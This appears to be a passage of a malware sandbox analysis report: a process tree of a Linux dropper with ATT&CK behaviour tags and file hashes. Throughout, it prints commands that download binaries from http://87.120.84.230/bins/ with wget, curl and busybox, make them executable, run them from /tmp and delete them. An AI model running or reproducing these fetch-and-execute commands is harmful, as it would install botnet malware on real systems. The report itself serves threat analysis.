PID:1658
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵PID:1659
-
-
/bin/chmodchmod 777 rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- File and Directory Permissions Modification
PID:1660
-
-
/tmp/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7./rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- Executes dropped EXE
PID:1661
-
-
/bin/rmrm rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵PID:1662
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵PID:1663
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- Writes file to tmp directory
PID:1664
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵PID:1665
-
-
/bin/chmodchmod 777 GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- File and Directory Permissions Modification
PID:1666
-
-
/tmp/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn./GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- Executes dropped EXE
PID:1667
-
-
/bin/rmrm GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵PID:1668
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵PID:1669
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- Writes file to tmp directory
PID:1670
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵PID:1671
-
-
/bin/chmodchmod 777 MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- File and Directory Permissions Modification
PID:1672
-
-
/tmp/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7./MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- Executes dropped EXE
PID:1673
-
-
/bin/rmrm MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵PID:1674
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵PID:1675
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- Writes file to tmp directory
PID:1676
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵PID:1677
-
-
/bin/chmodchmod 777 O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- File and Directory Permissions Modification
PID:1678
-
-
/tmp/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI./O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- Executes dropped EXE
PID:1679
-
-
/bin/rmrm O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵PID:1680
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵PID:1681
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- Writes file to tmp directory
PID:1682
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵PID:1683
-
-
/bin/chmodchmod 777 eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- File and Directory Permissions Modification
PID:1684
-
-
/tmp/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy./eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- Executes dropped EXE
PID:1685
-
-
/bin/rmrm eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵PID:1686
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵PID:1687
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- Writes file to tmp directory
PID:1688
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵PID:1689
-
-
/bin/chmodchmod 777 QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- File and Directory Permissions Modification
PID:1690
-
-
/tmp/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H./QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- Executes dropped EXE
PID:1691
-
-
/bin/rmrm QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵PID:1692
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97